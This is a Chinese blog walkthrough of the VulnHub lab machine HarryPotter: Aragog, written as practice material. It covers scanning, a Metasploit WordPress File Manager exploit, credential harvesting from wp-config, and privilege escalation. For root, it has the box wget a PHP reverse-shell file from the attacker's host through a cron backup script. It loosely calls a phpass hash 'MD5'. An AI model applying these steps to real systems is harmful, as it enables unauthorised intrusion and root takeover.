vulnhub之 HarryPotter: Aragog (1.0.2)

最新推荐文章于 2024-02-26 19:46:38 发布
最新推荐文章于 2024-02-26 19:46:38 发布
阅读量363 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: html5 html css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qwweggfe/article/details/119992350
版权

靶机ip:192.168.181.145

kali ip: 192.168.181.129

首先进行ip扫描

打开网页进行查看

 查看开启哪些端口

nmap -sC -sV 192.168.181.145 --min-rate=2000 -d

 对目录进行扫描

 打开/blog页面

 发现notice无法进行跳转,修改/etc/hosts文件

 然后在kali打开

 用wpscan进行扫描

 

 发现有File Manager的漏洞于是打开msfcondole

 使用第二个,并进行相应的配置

 运行,可以获得shell

 

 python3 -c 'import pty;pty.spawn("/bin/bash")'

可以获得shell

 d98发现了一个bese64的编码的一段文字

这是翻译后的结果:1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets,翻译为 1:里德尔的日记在《密室》中被哈利毁掉

于是我们查找所有带有wordpress的目录名

find / -type d -name "wordpress" 2>/dev/null

 我们查看到了所有数据库用户名和密码

define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');

于是进行爆破

爆破失败

我们进入到mysql,上面给了我们用户名和密码

在wordpress找到了密码$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

select * from wp_users

对其进行MD5解码

password123

 

 于是进行ssh登录

登录成功

进行提权

看看能否使用sudo提权

find / -perm -u=s -type f 2>/dev/null

没有可以利用的

于是查看是否有脚本

find / -name "*back*"

 发现一个备份文件,于是进行查看

他告诉我们要在tmp下创建一个upload,获取权限

在kali端开启web服务

 wget http://192.168.181.129:8888/11.php

 将php文件下载到/tmp下

 在kali端进行监听

 

 稍等片刻后可以获得root权限

 于是获得最终的flag

 

我带的我们
关注
专栏目录
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 455
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3354
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1580
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
vulnhub_HARRYPOTTER: ARAGOG (1.0.2)
qq_45434762的博客
06-13 4838
主机信息kali: 192.168.1.12 Momentum:192.168.1.101 信息收集通过nmap扫描目标主机发现仅开放22、80端口nmap -T4 -A -v -p- 1...
HarryPotter第一部—Aragog-1.0.2
weixin_47311099的博客
01-13 1333
Aragog 是 3 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。 信息收集 nmap扫描 nmap -sC -sV 192.168.210.148 IP地址靶机登录界面已经给出 根据扫描结果可得22ssh ,80http ​ 网站信息收集 只有一张图片 爆破一下网站目录 ​ dirb http://192.168.210.148 爆出来一个blog 页面有
harrypotter::artist_palette:哈利·波特(Rarry)启发的调色板
02-05
harrypotter::artist_palette:哈利·波特(Rarry)启发的调色板
HarryPotter::mage_light_skin_tone:基于MVVM架构(ViewModel,LiveData,存储库,协程,Koin或Dagger-Hilt)的示例HarryPotter应用程序
05-02
哈利·波特 哈利·波特应用程序是基于MVVM架构的示例。 通过存储库模式从网络获取数据。 :high_voltage: 下载 转到此以下载APK :light_bulb: 堆栈和库 最低SDK级别21 基于 +用于异步。 喷气背包 ...
alura-quiz-harrypotter:在沉浸式的《光环》中用爱完成的项目
05-07
带有样式组件的示例应用 此示例介绍了如何使用与样式不同的样式解决方案,也支持通用样式。... 在这种情况下,我们使用 。 为此,我们扩展了并将服务器端渲染的样式注入到<head> ,并且还添加了babel-plugin-...
aluraquiz-harrypotter:在React和Next.Js中进行测验,并用葡萄牙语询问有关哈利·波特的问题
05-24
哈利·波特测验 在React和Next.Js中进行测验,并用葡萄牙语询问有关哈利·波特的问题 来自Alura的ImersãoReact Next.js项目 您可以在这里(葡萄牙语)看到此应用程序的实时运行: : 工具 React ...
Vulnhub】之Aragog-1.0.2
zg_111的博客
04-11 733
wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码。所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容。浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的。继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh。等待片刻,成功获取到root权限,并在root目录下发现了。
Aragog-1.0.2靶机
ybkj6666的博客
11-03 180
使用arp-scan找目标ip,这边可以得知我们的目标ip为192.168.187.165输入命令: 发现了2个端口开放输入命令: 这边没有扫描到udp端口输入命令: 输入命令: 但是没有扫描到扫描可利用的漏洞点页面就是一张图片(哈利波特可还行)使用dirsearch和gobuster两个工具进行目录爆破输入命令: 这里扫描到了几个目录,等下去看看怎么个事输入命令: 我们在查看这个blog目录的时候,发现跳转到了新的页面。如果页面显示不正常的话,可能是页面没有解析的原因,就像下图这样此时我们需要以root的
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1205
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 506
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
VulnHub靶场】——HARRYPOTTER第一部- ARAGOG (1.0.2)
qq_53058639的博客
01-23 965
作者名:Demo不是emo主页面链接: ****创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家座右铭:不要让时代的悲哀成为你的悲哀专研方向:网络安全,数据结构每日emo:人们感到委屈的时候通常就说睡了!今天的博客内容是教程(),靶场环境来源于,该网站有很多虚拟机靶场,在这,推荐大家使用,大家进去直接搜索就能下载今天的靶场了,
HarryPotter-Aragog 三部曲之第一部 靶场记录
m0_52729465的博客
08-04 105
5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。
Vulnhub靶机】HarryPotter-Aragog-1.0.2 漏洞复现
最新发布
weixin_65900584的博客
02-26 1280
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
Vulnhub靶机】HarryPotter-Aragog-1.0.2哈利波特系列靶机-1
过期的秋刀鱼
09-09 878
需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip。登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将。推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行。是php的执行文件的目录,这样才能执行php文件。下的部分目录,并且出现了。
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7783
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Harry Potter 英文词频统计python代码
05-26
以下是一个简单的 Python 代码,用于统计《哈利波特》(Harry Potter)第一部小说中单词的出现频率。需要注意的是,这个代码只是一个基础的示例,可能需要根据具体情况进行修改和优化。 ```python # 导入所需的库 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值